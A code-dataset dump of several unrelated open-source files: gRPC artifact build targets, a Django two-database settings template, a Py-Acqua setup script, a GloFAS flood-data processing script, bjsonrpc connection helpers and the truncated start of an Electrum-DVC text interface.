repo_name (string) | path (string) | copies (string) | size (string) | content (string) | license (string) | hash (int64) | line_mean (float64) | line_max (int64) | alpha_frac (float64) | autogenerated (bool)
---|---|---|---|---|---|---|---|---|---|---
kpayson64/grpc | tools/run_tests/artifacts/artifact_targets.py | 1 | 14711 | #!/usr/bin/env python
# Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Definition of targets to build artifacts."""
import os.path
import random
import string
import sys
sys.path.insert(0, os.path.abspath('..'))
import python_utils.jobset as jobset
def create_docker_jobspec(name,
dockerfile_dir,
shell_command,
environ={},
flake_retries=0,
timeout_retries=0,
timeout_seconds=30 * 60,
docker_base_image=None,
extra_docker_args=None,
verbose_success=False):
"""Creates jobspec for a task running under docker."""
environ = environ.copy()
environ['RUN_COMMAND'] = shell_command
environ['ARTIFACTS_OUT'] = 'artifacts/%s' % name
docker_args = []
for k, v in environ.items():
docker_args += ['-e', '%s=%s' % (k, v)]
docker_env = {
'DOCKERFILE_DIR': dockerfile_dir,
'DOCKER_RUN_SCRIPT': 'tools/run_tests/dockerize/docker_run.sh',
'OUTPUT_DIR': 'artifacts'
}
if docker_base_image is not None:
docker_env['DOCKER_BASE_IMAGE'] = docker_base_image
if extra_docker_args is not None:
docker_env['EXTRA_DOCKER_ARGS'] = extra_docker_args
jobspec = jobset.JobSpec(
cmdline=['tools/run_tests/dockerize/build_and_run_docker.sh'] +
docker_args,
environ=docker_env,
shortname='build_artifact.%s' % (name),
timeout_seconds=timeout_seconds,
flake_retries=flake_retries,
timeout_retries=timeout_retries,
verbose_success=verbose_success)
return jobspec
def create_jobspec(name,
cmdline,
environ={},
shell=False,
flake_retries=0,
timeout_retries=0,
timeout_seconds=30 * 60,
use_workspace=False,
cpu_cost=1.0,
verbose_success=False):
"""Creates jobspec."""
environ = environ.copy()
if use_workspace:
environ['WORKSPACE_NAME'] = 'workspace_%s' % name
environ['ARTIFACTS_OUT'] = os.path.join('..', 'artifacts', name)
cmdline = ['bash', 'tools/run_tests/artifacts/run_in_workspace.sh'
] + cmdline
else:
environ['ARTIFACTS_OUT'] = os.path.join('artifacts', name)
jobspec = jobset.JobSpec(
cmdline=cmdline,
environ=environ,
shortname='build_artifact.%s' % (name),
timeout_seconds=timeout_seconds,
flake_retries=flake_retries,
timeout_retries=timeout_retries,
shell=shell,
cpu_cost=cpu_cost,
verbose_success=verbose_success)
return jobspec
_MACOS_COMPAT_FLAG = '-mmacosx-version-min=10.7'
_ARCH_FLAG_MAP = {'x86': '-m32', 'x64': '-m64'}
class PythonArtifact:
"""Builds Python artifacts."""
def __init__(self, platform, arch, py_version):
self.name = 'python_%s_%s_%s' % (platform, arch, py_version)
self.platform = platform
self.arch = arch
self.labels = ['artifact', 'python', platform, arch, py_version]
self.py_version = py_version
def pre_build_jobspecs(self):
return []
def build_jobspec(self):
environ = {}
if self.platform == 'linux_extra':
# Raspberry Pi build
environ['PYTHON'] = '/usr/local/bin/python{}'.format(
self.py_version)
environ['PIP'] = '/usr/local/bin/pip{}'.format(self.py_version)
# https://github.com/resin-io-projects/armv7hf-debian-qemu/issues/9
# A QEMU bug causes submodule update to hang, so we copy directly
environ['RELATIVE_COPY_PATH'] = '.'
extra_args = ' --entrypoint=/usr/bin/qemu-arm-static '
return create_docker_jobspec(
self.name,
'tools/dockerfile/grpc_artifact_linux_{}'.format(self.arch),
'tools/run_tests/artifacts/build_artifact_python.sh',
environ=environ,
timeout_seconds=60 * 60 * 5,
docker_base_image='quay.io/grpc/raspbian_{}'.format(self.arch),
extra_docker_args=extra_args)
elif self.platform == 'linux':
if self.arch == 'x86':
environ['SETARCH_CMD'] = 'linux32'
# Inside the manylinux container, the python installations are located in
# special places...
environ['PYTHON'] = '/opt/python/{}/bin/python'.format(
self.py_version)
environ['PIP'] = '/opt/python/{}/bin/pip'.format(self.py_version)
# Platform autodetection for the manylinux1 image breaks so we set the
# defines ourselves.
# TODO(atash) get better platform-detection support in core so we don't
# need to do this manually...
environ['CFLAGS'] = '-DGPR_MANYLINUX1=1'
environ['GRPC_BUILD_GRPCIO_TOOLS_DEPENDENTS'] = 'TRUE'
environ['GRPC_BUILD_MANYLINUX_WHEEL'] = 'TRUE'
return create_docker_jobspec(
self.name,
'tools/dockerfile/grpc_artifact_python_manylinux_%s' %
self.arch,
'tools/run_tests/artifacts/build_artifact_python.sh',
environ=environ,
timeout_seconds=60 * 60,
docker_base_image='quay.io/pypa/manylinux1_i686'
if self.arch == 'x86' else 'quay.io/pypa/manylinux1_x86_64')
elif self.platform == 'windows':
if 'Python27' in self.py_version or 'Python34' in self.py_version:
environ['EXT_COMPILER'] = 'mingw32'
else:
environ['EXT_COMPILER'] = 'msvc'
# For some reason, the batch script %random% always runs with the same
# seed. We create a random temp-dir here
dir = ''.join(
random.choice(string.ascii_uppercase) for _ in range(10))
return create_jobspec(
self.name, [
'tools\\run_tests\\artifacts\\build_artifact_python.bat',
self.py_version, '32' if self.arch == 'x86' else '64'
],
environ=environ,
timeout_seconds=45 * 60,
use_workspace=True)
else:
environ['PYTHON'] = self.py_version
environ['SKIP_PIP_INSTALL'] = 'TRUE'
return create_jobspec(
self.name,
['tools/run_tests/artifacts/build_artifact_python.sh'],
environ=environ,
timeout_seconds=60 * 60 * 2,
use_workspace=True)
def __str__(self):
return self.name
class RubyArtifact:
"""Builds ruby native gem."""
def __init__(self, platform, arch):
self.name = 'ruby_native_gem_%s_%s' % (platform, arch)
self.platform = platform
self.arch = arch
self.labels = ['artifact', 'ruby', platform, arch]
def pre_build_jobspecs(self):
return []
def build_jobspec(self):
# Ruby build uses docker internally and docker cannot be nested.
# We are using a custom workspace instead.
return create_jobspec(
self.name, ['tools/run_tests/artifacts/build_artifact_ruby.sh'],
use_workspace=True,
timeout_seconds=45 * 60)
class CSharpExtArtifact:
"""Builds C# native extension library"""
def __init__(self, platform, arch):
self.name = 'csharp_ext_%s_%s' % (platform, arch)
self.platform = platform
self.arch = arch
self.labels = ['artifact', 'csharp', platform, arch]
def pre_build_jobspecs(self):
return []
def build_jobspec(self):
if self.platform == 'windows':
cmake_arch_option = 'Win32' if self.arch == 'x86' else self.arch
return create_jobspec(
self.name, [
'tools\\run_tests\\artifacts\\build_artifact_csharp.bat',
cmake_arch_option
],
use_workspace=True)
else:
environ = {
'CONFIG': 'opt',
'EMBED_OPENSSL': 'true',
'EMBED_ZLIB': 'true',
'CFLAGS': '-DGPR_BACKWARDS_COMPATIBILITY_MODE',
'CXXFLAGS': '-DGPR_BACKWARDS_COMPATIBILITY_MODE',
'LDFLAGS': ''
}
if self.platform == 'linux':
return create_docker_jobspec(
self.name,
'tools/dockerfile/grpc_artifact_linux_%s' % self.arch,
'tools/run_tests/artifacts/build_artifact_csharp.sh',
environ=environ)
else:
archflag = _ARCH_FLAG_MAP[self.arch]
environ['CFLAGS'] += ' %s %s' % (archflag, _MACOS_COMPAT_FLAG)
environ['CXXFLAGS'] += ' %s %s' % (archflag, _MACOS_COMPAT_FLAG)
environ['LDFLAGS'] += ' %s' % archflag
return create_jobspec(
self.name,
['tools/run_tests/artifacts/build_artifact_csharp.sh'],
environ=environ,
use_workspace=True)
def __str__(self):
return self.name
class PHPArtifact:
"""Builds PHP PECL package"""
def __init__(self, platform, arch):
self.name = 'php_pecl_package_{0}_{1}'.format(platform, arch)
self.platform = platform
self.arch = arch
self.labels = ['artifact', 'php', platform, arch]
def pre_build_jobspecs(self):
return []
def build_jobspec(self):
if self.platform == 'linux':
return create_docker_jobspec(
self.name, 'tools/dockerfile/grpc_artifact_linux_{}'.format(
self.arch),
'tools/run_tests/artifacts/build_artifact_php.sh')
else:
return create_jobspec(
self.name, ['tools/run_tests/artifacts/build_artifact_php.sh'],
use_workspace=True)
class ProtocArtifact:
"""Builds protoc and protoc-plugin artifacts"""
def __init__(self, platform, arch):
self.name = 'protoc_%s_%s' % (platform, arch)
self.platform = platform
self.arch = arch
self.labels = ['artifact', 'protoc', platform, arch]
def pre_build_jobspecs(self):
return []
def build_jobspec(self):
if self.platform != 'windows':
cxxflags = '-DNDEBUG %s' % _ARCH_FLAG_MAP[self.arch]
ldflags = '%s' % _ARCH_FLAG_MAP[self.arch]
if self.platform != 'macos':
ldflags += ' -static-libgcc -static-libstdc++ -s'
environ = {
'CONFIG': 'opt',
'CXXFLAGS': cxxflags,
'LDFLAGS': ldflags,
'PROTOBUF_LDFLAGS_EXTRA': ldflags
}
if self.platform == 'linux':
return create_docker_jobspec(
self.name,
'tools/dockerfile/grpc_artifact_protoc',
'tools/run_tests/artifacts/build_artifact_protoc.sh',
environ=environ)
else:
environ[
'CXXFLAGS'] += ' -std=c++11 -stdlib=libc++ %s' % _MACOS_COMPAT_FLAG
return create_jobspec(
self.name,
['tools/run_tests/artifacts/build_artifact_protoc.sh'],
environ=environ,
timeout_seconds=60 * 60,
use_workspace=True)
else:
generator = 'Visual Studio 14 2015 Win64' if self.arch == 'x64' else 'Visual Studio 14 2015'
return create_jobspec(
self.name,
['tools\\run_tests\\artifacts\\build_artifact_protoc.bat'],
environ={'generator': generator},
use_workspace=True)
def __str__(self):
return self.name
def targets():
"""Gets list of supported targets"""
return ([
Cls(platform, arch)
for Cls in (CSharpExtArtifact, ProtocArtifact)
for platform in ('linux', 'macos', 'windows') for arch in ('x86', 'x64')
] + [
PythonArtifact('linux', 'x86', 'cp27-cp27m'),
PythonArtifact('linux', 'x86', 'cp27-cp27mu'),
PythonArtifact('linux', 'x86', 'cp34-cp34m'),
PythonArtifact('linux', 'x86', 'cp35-cp35m'),
PythonArtifact('linux', 'x86', 'cp36-cp36m'),
PythonArtifact('linux_extra', 'armv7', '2.7'),
PythonArtifact('linux_extra', 'armv7', '3.4'),
PythonArtifact('linux_extra', 'armv7', '3.5'),
PythonArtifact('linux_extra', 'armv7', '3.6'),
PythonArtifact('linux_extra', 'armv6', '2.7'),
PythonArtifact('linux_extra', 'armv6', '3.4'),
PythonArtifact('linux_extra', 'armv6', '3.5'),
PythonArtifact('linux_extra', 'armv6', '3.6'),
PythonArtifact('linux', 'x64', 'cp27-cp27m'),
PythonArtifact('linux', 'x64', 'cp27-cp27mu'),
PythonArtifact('linux', 'x64', 'cp34-cp34m'),
PythonArtifact('linux', 'x64', 'cp35-cp35m'),
PythonArtifact('linux', 'x64', 'cp36-cp36m'),
PythonArtifact('macos', 'x64', 'python2.7'),
PythonArtifact('macos', 'x64', 'python3.4'),
PythonArtifact('macos', 'x64', 'python3.5'),
PythonArtifact('macos', 'x64', 'python3.6'),
PythonArtifact('windows', 'x86', 'Python27_32bits'),
PythonArtifact('windows', 'x86', 'Python34_32bits'),
PythonArtifact('windows', 'x86', 'Python35_32bits'),
PythonArtifact('windows', 'x86', 'Python36_32bits'),
PythonArtifact('windows', 'x64', 'Python27'),
PythonArtifact('windows', 'x64', 'Python34'),
PythonArtifact('windows', 'x64', 'Python35'),
PythonArtifact('windows', 'x64', 'Python36'),
RubyArtifact('linux', 'x64'),
RubyArtifact('macos', 'x64'),
PHPArtifact('linux', 'x64'),
PHPArtifact('macos', 'x64')
])
| apache-2.0 | 2,395,240,654,222,034,400 | 37.815303 | 104 | 0.54585 | false |
IQSS/miniverse | miniverse/settings/local_with_routing.py | 1 | 6078 | """
Settings template for running two databases:
- Existing Dataverse database (we only read it)
- Second database for Django core apps + Miniverse apps
Please read through and change the settings where noted
"""
from __future__ import absolute_import
import sys
from os import makedirs, environ
from os.path import join, isdir
from miniverse.testrunners.disable_migrations import DisableMigrations
from miniverse.settings.base import *
# -----------------------------------
# DEBUG
# - True: Dataverse Key required for API
# - Includes SQL for many of the API call results
# -----------------------------------
DEBUG = True #True False
# -----------------------------------
# TIME_ZONE
# -----------------------------------
TIME_ZONE = 'America/New_York'
# -----------------------------------
# Secret key
# -----------------------------------
SECRET_KEY = 'DEV-j94xnz*dj5f@_6-gt@ov)yjbcx0uagb7sv9a0j-(jo)j%m$el%'
# -----------------------------------
# Metrics cache settings
# -----------------------------------
METRICS_CACHE_VIEW = False
METRICS_CACHE_VIEW_TIME = 60 * 60 * 2 # Cache for visualizations
METRICS_CACHE_API_TIME = 60 * 15 # Cache for API endpoints
# -----------------------------------
# For local runs, this directory will include:
# - static files (after running 'collectstatic')
# - optional, sqlite db if that's used for the Django apps db
# -----------------------------------
LOCAL_SETUP_DIR = join(PROJECT_ROOT, 'test_setup')
if not isdir(LOCAL_SETUP_DIR):
makedirs(LOCAL_SETUP_DIR)
# -----------------------------------
# Database routing.
# e.g. between the Dataverse db and Django db
# -----------------------------------
DATABASE_ROUTERS = ['miniverse.db_routers.db_dataverse_router.DataverseRouter',]
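# For illustration of the routing idea above: a minimal sketch of such a router
# (the class body and the 'dv_apps' app label are assumptions for this example,
# not the actual miniverse.db_routers implementation). It sends reads for the
# Dataverse models to the 'dataverse' connection and keeps writes and
# migrations off that read-only database:
#
# class DataverseRouter(object):
#     def db_for_read(self, model, **hints):
#         return 'dataverse' if model._meta.app_label == 'dv_apps' else 'default'
#     def db_for_write(self, model, **hints):
#         return None if model._meta.app_label == 'dv_apps' else 'default'
#     def allow_migrate(self, db, app_label, model_name=None, **hints):
#         return db == 'default' and app_label != 'dv_apps'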
# -----------------------------------
# URL of the Dataverse db being read
# -----------------------------------
#DATAVERSE_INSTALLATION_URL = 'https://demo.dataverse.org'
#DATAVERSE_INSTALLATION_URL = 'https://dataverse.harvard.edu'
DATAVERSE_INSTALLATION_URL = 'http://localhost:8080'
# -----------------------------------
# Database Setup
# - default -> Create a new db for the django/miniverse specific apps
# - May be any relational db type: postgres, sqlite, etc
# - dataverse -> Read-only users for the Dataverse Postgres db
# -----------------------------------
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': join(LOCAL_SETUP_DIR, 'miniverse_default.db3'),
},
'dataverse': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'dvndb', # dvndb_demo, dvn_thedata, dvndb
'USER': 'postgres', # Set to a read-only user
'PASSWORD': '123',
'HOST': 'localhost',
'TEST': {
'MIRROR': 'default', # For running tests, only create 1 db
},
}
}
# -----------------------------------
# Need when running DEBUG = False
# -----------------------------------
ALLOWED_HOSTS = ('127.0.0.1', 'dd7be506.ngrok.io')
# -----------------------------------
# Need to set when RestrictAdminMiddleware is active
# -----------------------------------
INTERNAL_IPS = ('127.0.0.1',)
# -----------------------------------
# Slackbot
# -----------------------------------
SLACK_USERNAME = 'dvbot'
SLACK_BOT_TOKEN = environ.get('SLACK_BOT_TOKEN')
BOT_ID = environ.get('BOT_ID')
SLACK_WEBHOOK_SECRET = environ.get('SLACK_WEBHOOK_SECRET')
# -----------------------------------
# Optional MIDDLEWARE_CLASSES
# -----------------------------------
MIDDLEWARE_CLASSES += [
# Restrict by IP address
#'dv_apps.admin_restrict.middleware.RestrictAdminMiddleware',
# Email about broken 404s
#'django.middleware.common.BrokenLinkEmailsMiddleware',
]
# -----------------------------------
# cookie name
# -----------------------------------
SESSION_COOKIE_NAME = 'dv_metrics'
# -----------------------------------
# Where static files are collected
# -----------------------------------
STATIC_ROOT = join(LOCAL_SETUP_DIR, 'staticfiles')
if not isdir(STATIC_ROOT):
makedirs(STATIC_ROOT)
# -----------------------------------
# Django Debug TOOLBAR CONFIGURATION
# -----------------------------------
# See: http://django-debug-toolbar.readthedocs.org/en/latest/installation.html#explicit-setup
# -----------------------------------
INSTALLED_APPS += (
'debug_toolbar',
'django.contrib.admindocs',
)
MIDDLEWARE_CLASSES += [
'debug_toolbar.middleware.DebugToolbarMiddleware',
]
DEBUG_TOOLBAR_PATCH_SETTINGS = False
# http://django-debug-toolbar.readthedocs.org/en/latest/installation.html
# -----------------------------------
# For running tests:
# - Only create 1 test database; it has to be a Postgres db
# - Remove the Database routing
# - Disable migrations, e.g. we don't want to run them
# - Set a new TEST_RUNNER:
# - We want to *create* unmanaged tables in the test db
# - Disable timezone awareness for fixture loading
# -----------------------------------
if 'test' in sys.argv or 'test_coverage' in sys.argv: # Covers regular testing and django-coverage
DATABASES['default']['ENGINE'] = 'django.db.backends.postgresql_psycopg2'
DATABASES['default']['HOST'] = 'localhost'
DATABASES['default']['USER'] = 'postgres'
DATABASES['default']['PASSWORD'] = '123'
# The custom routers we're using to route certain ORM queries
# to the remote host conflict with our overridden db settings.
# Set DATABASE_ROUTERS to an empty list to return to the defaults
# during the test run.
DATABASE_ROUTERS = []
MIGRATION_MODULES = DisableMigrations()
# Set Django's test runner a custom class that will create
# 'unmanaged' tables
TEST_RUNNER = 'miniverse.testrunners.managed_model_test_runner.ManagedModelTestRunner'
# Disable timezone awareness to False to avoid warnings when loading fixtures
# e.g. to avoid: RuntimeWarning: (some object)received a naive datetime (2016-08-16
# 09:25:41.349000) while time zone support is active.
USE_TZ = False
| mit | 906,195,234,186,292,000 | 33.534091 | 99 | 0.557585 | false |
sanluca/py-acqua | setup.py | 1 | 1902 | # -*- coding: iso-8859-15 -*-
#Copyright (C) 2005, 2008 Py-Acqua
#http://www.pyacqua.net
#email: [email protected]
#
#
#Py-Acqua is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
#Py-Acqua is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Py-Acqua; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import os
import sys
import glob
from distutils.core import setup
###
def moon_walk (root_dir, repl):
packages, data_files = [], []
for dirpath, dirnames, filenames in os.walk (root_dir):
for i, dirname in enumerate (dirnames):
if dirname.startswith('.'): del dirnames[i]
data_files.append(("share/pyacqua/" + repl + dirpath[len(root_dir):], [os.path.join(dirpath, f) for f in filenames]))
return data_files
if __name__ != "__main__":
print moon_walk (sys.argv[1])
else:
setup (
name="py-acqua",
version="1.0",
description="PyAcqua program",
author="Francesco Piccinno",
author_email="[email protected]",
url="http://pyacqua.altervista.org",
scripts=["src/acqua.py"],
package_dir={'pyacqua': 'src'},
packages=['pyacqua'],
data_files=moon_walk ("skins", "skins") + moon_walk ("locale", "locale") + [
#("src", glob.glob ("src/*")),
("share/pyacqua/plugins", glob.glob ("plugins/*.py")),
("share/pyacqua/pixmaps", glob.glob ("pixmaps/*")),
("share/pyacqua/tips", ["src/tip_of_the_day_en.txt", "src/tip_of_the_day.txt"])
]
)
| gpl-2.0 | 8,070,389,984,959,156,000 | 32.368421 | 120 | 0.679811 | false |
bhermansyah/DRR-datacenter | scripts/misc-boedy1996/glofas_refactor.py | 1 | 6276 | import os, sys
os.environ.setdefault("DJANGO_SETTINGS_MODULE","geonode.settings")
import csv
from django.db import connection, connections
from django.conf import settings
from geodb.models import Glofasintegrated, AfgBasinLvl4GlofasPoint
from netCDF4 import Dataset, num2date
import numpy as np
from django.contrib.gis.geos import Point
def getRefactorData():
# f_IN = open("/Users/budi/Documents/iMMAP/DRR-datacenter/scripts/misc-boedy1996/Glofas_Baseline_Output_Adjustment_factor.csv", 'rU')
f_IN = open("/home/ubuntu/Glofas_Baseline_Output_Adjustment_factor.csv", 'rU')
reader = csv.reader(f_IN)
first = True
data = {}
for row in reader:
if first:
first = False
else:
lon = row[2]
lat = row[1]
# data[lat][lon]['rl2_factor']=row[8]
data.setdefault(lat, {})[lon] = {'rl2_factor':row[8],'rl5_factor':row[9],'rl20_factor':row[10]}
f_IN.close()
# print data['67.75']['31.85']
return data
def calculate_glofas_params(date):
date_arr = date.split('-')
filename = getattr(settings, 'GLOFAS_NC_FILES')+date_arr[0]+date_arr[1]+date_arr[2]+"00.nc"
# print Glofasintegrated.objects.latest('datadate').date
nc = Dataset(filename, 'r', Format='NETCDF4')
# get coordinates variables
lats = nc.variables['lat'][:]
lons = nc.variables['lon'][:]
rl2s= nc.variables['rl2'][:]
rl5s= nc.variables['rl5'][:]
rl20s= nc.variables['rl20'][:]
times = nc.variables['time'][:]
essemble = nc.variables['ensemble'][:]
# convert date, how to store date only strip away time?
# print "Converting Dates"
units = nc.variables['time'].units
dates = num2date (times[:], units=units, calendar='365_day')
d = np.array(nc.variables['dis'])
# header = ['Latitude', 'Longitude', 'rl2', 'rl5', 'rl20', 'rl2_dis_percent', 'rl2_avg_dis_percent', 'rl5_dis_percent', 'rl5_avg_dis_percent', 'rl20_dis_percent', 'rl20_avg_dis_percent']
times_index=[]
for i,j in enumerate(times):
times_index.append(i)
coord_index = 0
refactor = getRefactorData()
for lat, lon, rl2, rl5, rl20 in zip(lats, lons, rl2s, rl5s, rl20s):
# print str(lat), str(lon)
try:
# print refactor[str(lat)][str(lon)]
rl2_temp = rl2*float(refactor[str(lat)][str(lon)]['rl2_factor'])
rl5_temp = rl5*float(refactor[str(lat)][str(lon)]['rl5_factor'])
rl20_temp = rl20*float(refactor[str(lat)][str(lon)]['rl20_factor'])
except:
rl2_temp = rl2
rl5_temp = rl5
rl20_temp = rl20
rl2 = rl2_temp
rl5 = rl5_temp
rl20 = rl20_temp
# print rl2,rl5,rl20, refactor[str(lat)][str(lon)]['rl2_factor']
data_in = []
data_in.append(lat)
data_in.append(lon)
data_in.append(rl2)
data_in.append(rl5)
data_in.append(rl20)
rl2_dis_percent = []
rl5_dis_percent = []
rl20_dis_percent = []
rl2_avg_dis = []
rl5_avg_dis = []
rl20_avg_dis = []
for i in times_index:
data = d[i,:,coord_index]
dis_data = []
for l in data:
dis_data.append(l)
dis_avg = np.median(dis_data)
count = sum(1 for x in data if x>rl2)
percent_rl2 = round(float(count)/float(51)*100)
rl2_avg_dis.append(round(float(dis_avg)/float(rl2)*100))
rl2_dis_percent.append(percent_rl2)
count = sum(1 for x in data if x>rl5)
percent_rl5 = round(float(count)/float(51)*100)
rl5_avg_dis.append(round(float(dis_avg)/float(rl5)*100))
rl5_dis_percent.append(percent_rl5)
count = sum(1 for x in data if x>rl20)
percent_rl20 = round(float(count)/float(51)*100)
rl20_avg_dis.append(round(float(dis_avg)/float(rl20)*100))
rl20_dis_percent.append(percent_rl20)
if i>=19:
break
# print rl2_avg_dis
data_in.append(max(rl2_dis_percent))
temp_avg_dis=[]
for index, item in enumerate(rl2_dis_percent):
if item == max(rl2_dis_percent):
# print index, item
temp_avg_dis.append(rl2_avg_dis[index])
data_in.append(max(temp_avg_dis))
rl2_avg_dis_percent = max(temp_avg_dis)
data_in.append(max(rl5_dis_percent))
temp_avg_dis=[]
for index, item in enumerate(rl5_dis_percent):
if item == max(rl5_dis_percent):
# print index, item
temp_avg_dis.append(rl5_avg_dis[index])
data_in.append(max(temp_avg_dis))
rl5_avg_dis_percent = max(temp_avg_dis)
data_in.append(max(rl20_dis_percent))
temp_avg_dis=[]
for index, item in enumerate(rl20_dis_percent):
if item == max(rl20_dis_percent):
# print index, item
temp_avg_dis.append(rl20_avg_dis[index])
data_in.append(max(temp_avg_dis))
rl20_avg_dis_percent = max(temp_avg_dis)
if coord_index>2035 and max(rl2_dis_percent)>=25:
pnt = Point(round(float(lon),2), round(float(lat),2), srid=4326)
checkdata = AfgBasinLvl4GlofasPoint.objects.filter(geom__intersects=pnt)
for z in checkdata:
p = Glofasintegrated(basin_id=z.value, datadate=date, lon=lon, lat=lat, rl2=rl2, rl5=rl5, rl20=rl20, rl2_dis_percent=max(rl2_dis_percent), rl2_avg_dis_percent=rl2_avg_dis_percent, rl5_dis_percent=max(rl5_dis_percent), rl5_avg_dis_percent=rl5_avg_dis_percent, rl20_dis_percent=max(rl20_dis_percent), rl20_avg_dis_percent=rl20_avg_dis_percent)
p.save()
print coord_index, z.value
coord_index = coord_index+1
# print data_in
# print Glofasintegrated.objects.filter(datadate=date).count()
# if Glofasintegrated.objects.filter(datadate=date).count() == 0 :
# Glofasintegrated(datadate=date).save()
nc.close()
Glofasintegrated.objects.filter(datadate='2017-04-13').delete()
calculate_glofas_params('2017-04-13')
# px = Glofasintegrated.objects.order_by().values('datadate').distinct()
# for i in px:
# print str(i['datadate'])
# Glofasintegrated.objects.filter(datadate=i['datadate']).delete()
# calculate_glofas_params(str(i['datadate']))
| gpl-3.0 | 6,982,054,730,688,295,000 | 33.108696 | 357 | 0.605003 | false |
deavid/bjsonrpc | bjsonrpc/main.py | 1 | 2824 | """
bjson/main.py
Copyright (c) 2010 David Martinez Marti
All rights reserved.
Licensed under 3-clause BSD License.
See LICENSE.txt for the full license text.
"""
import socket
import bjsonrpc.server
import bjsonrpc.connection
import bjsonrpc.handlers
__all__ = [
"createserver",
"connect",
]
def createserver(host="127.0.0.1", port=10123,
handler_factory=bjsonrpc.handlers.NullHandler,
sock=None, http=False):
"""
Creates a *bjson.server.Server* object linked to a listening socket.
Parameters:
**host**
Address (IP or Host Name) to listen to as in *socket.bind*.
Use "0.0.0.0" to listen to all address. By default this points to
127.0.0.1 to avoid security flaws.
**port**
Port number to bind the socket. In Unix, port numbers less
than 1024 require special permissions.
**handler_factory**
Class to instantiate to publish remote functions.
**(return value)**
A *bjson.server.Server* instance or raises an exception.
Servers are usually created this way::
import bjsonrpc
server = bjsonrpc.createserver("0.0.0.0")
server.serve()
Check :ref:`bjsonrpc.server` documentation
"""
if sock is None:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((host, port))
sock.listen(3)
return bjsonrpc.server.Server(sock, handler_factory=handler_factory, http=http)
def connect(host="127.0.0.1", port=10123,
sock=None, handler_factory=bjsonrpc.handlers.NullHandler):
"""
Creates a *bjson.connection.Connection* object linked to a connected
socket.
Parameters:
**host**
Address (IP or Host Name) to connect to.
**port**
Port number to connect to.
**handler_factory**
Class to instantiate to publish remote functions to the server.
By default this is *NullHandler* which means that no functions are
executable by the server.
**(return value)**
A *bjson.connection.Connection* instance or raises an exception.
Connections are usually created this way::
import bjsonrpc
conn = bjsonrpc.connect("rpc.host.net")
print conn.call.some_method_in_server_side()
"""
if sock is None:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
return bjsonrpc.connection.Connection(sock, handler_factory=handler_factory)
| bsd-3-clause | 5,525,710,750,083,788,000 | 29.042553 | 83 | 0.596671 | false |
testalt/electrum-dvc | gui/text.py | 1 | 17436 | import curses, datetime, locale
from decimal import Decimal
_ = lambda x:x
#from i18n import _
from electrum_dvc.util import format_satoshis, set_verbosity
from electrum_dvc.bitcoin import is_valid
from electrum_dvc import Wallet, WalletStorage
import tty, sys
class ElectrumGui:
def __init__(self, config, network):
self.config = config
self.network = network
storage = WalletStorage(config)
if not storage.file_exists:
print "Wallet not found. try 'electrum-dvc create'"
exit()
self.wallet = Wallet(storage)
self.wallet.start_threads(self.network)
locale.setlocale(locale.LC_ALL, '')
self.encoding = locale.getpreferredencoding()
self.stdscr = curses.initscr()
curses.noecho()
curses.cbreak()
curses.start_color()
curses.use_default_colors()
curses.init_pair(1, curses.COLOR_WHITE, curses.COLOR_BLUE)
curses.init_pair(2, curses.COLOR_WHITE, curses.COLOR_CYAN)
self.stdscr.keypad(1)
self.stdscr.border(0)
self.maxy, self.maxx = self.stdscr.getmaxyx()
self.set_cursor(0)
self.w = curses.newwin(10, 50, 5, 5)
set_verbosity(False)
self.tab = 0
self.pos = 0
self.popup_pos = 0
self.str_recipient = ""
self.str_description = ""
self.str_amount = ""
self.str_fee = ""
self.history = None
if self.network:
self.network.register_callback('updated', self.update)
self.network.register_callback('connected', self.refresh)
self.network.register_callback('disconnected', self.refresh)
self.network.register_callback('disconnecting', self.refresh)
self.tab_names = [_("History"), _("Send"), _("Receive"), _("Contacts"), _("Wall")]
self.num_tabs = len(self.tab_names)
def set_cursor(self, x):
try:
curses.curs_set(x)
except Exception:
pass
def restore_or_create(self):
pass
def verify_seed(self):
pass
def get_string(self, y, x):
self.set_cursor(1)
curses.echo()
self.stdscr.addstr( y, x, " "*20, curses.A_REVERSE)
s = self.stdscr.getstr(y,x)
curses.noecho()
self.set_cursor(0)
return s
def update(self):
self.update_history()
if self.tab == 0:
self.print_history()
self.refresh()
def print_history(self):
width = [20, 40, 14, 14]
delta = (self.maxx - sum(width) - 4)/3
format_str = "%"+"%d"%width[0]+"s"+"%"+"%d"%(width[1]+delta)+"s"+"%"+"%d"%(width[2]+delta)+"s"+"%"+"%d"%(width[3]+delta)+"s"
if self.history is None:
self.update_history()
self.print_list(self.history[::-1], format_str%( _("Date"), _("Description"), _("Amount"), _("Balance")))
def update_history(self):
width = [20, 40, 14, 14]
delta = (self.maxx - sum(width) - 4)/3
format_str = "%"+"%d"%width[0]+"s"+"%"+"%d"%(width[1]+delta)+"s"+"%"+"%d"%(width[2]+delta)+"s"+"%"+"%d"%(width[3]+delta)+"s"
b = 0
self.history = []
for item in self.wallet.get_tx_history():
tx_hash, conf, is_mine, value, fee, balance, timestamp = item
if conf:
try:
time_str = datetime.datetime.fromtimestamp( timestamp).isoformat(' ')[:-3]
except Exception:
time_str = "------"
else:
time_str = 'pending'
label, is_default_label = self.wallet.get_label(tx_hash)
self.history.append( format_str%( time_str, label, format_satoshis(value, whitespaces=True), format_satoshis(balance, whitespaces=True) ) )
def print_balance(self):
if not self.network:
msg = _("Offline")
elif self.network.is_connected():
if not self.wallet.up_to_date:
msg = _("Synchronizing...")
else:
